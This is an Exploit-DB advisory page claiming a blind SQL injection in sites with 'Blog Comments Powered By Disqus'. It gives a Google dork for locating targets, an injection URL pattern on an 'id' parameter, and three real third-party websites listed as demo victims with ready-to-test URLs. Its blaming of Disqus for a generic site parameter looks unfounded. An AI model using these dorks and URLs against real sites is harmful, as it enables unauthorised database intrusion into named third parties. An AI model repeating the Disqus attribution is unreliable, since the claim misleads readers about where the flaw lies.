Disqus Blog Comments - Blind SQL Injection

EDB-ID:

20913

CVE:



Author:

Spy_w4r3

Type:

webapps


Platform:

PHP

Date:

2012-08-29


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

:----------------------------------------------------------------------------------------------------------------------------------------:
Blog Comments Powered By Disqus <- Sql Injection
:----------------------------------------------------------------------------------------------------------------------------------------:

:----------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title: Blog Comments Powered By Disqus
: # Date: 28 August 2012
: # Author: Spy_w4r3
: # # Vendor or Software Link: http://disqus.com
: # Category : Web Applications
: # Google dork: inurl:/index.php?id= intext:"Powered by Disqus"
: # Vulnerability : SQL Injection Vulnerability
: # Tested On : Mozilla Firefox 14.0.1 (Windows)
: # Greetz to : Indonesian BlackHat Team, dr.spyc0d3r, syafm0vic007, budi_spielberg, zee.eichel, Xsan Lahci, ono_efeyu, wahyu_ade10, And Thia
:----------------------------------------------------------------------------------------------------------------------------------------:

# DORKS
:----------------------------------------------------------------------------------------------------------------------------------------:
inurl:/index.php?id= intext:"Powered by Disqus"

# Proof of Concept
:----------------------------------------------------------------------------------------------------------------------------------------:
SQL Injection : http://victim site/<path>/index.php?id=['SQL]

# Demo site: 
:----------------------------------------------------------------------------------------------------------------------------------------:
http://fourtales.com/index.php?id=116'
http://blasternation.com/index.php?id=131'
http://www.gogetaroomie.com/index.php?id=298'

# Credits 
:----------------------------------------------------------------------------------------------------------------------------------------:
http://indonesianblackhat.web.id | http://indonesianblackhat.web.id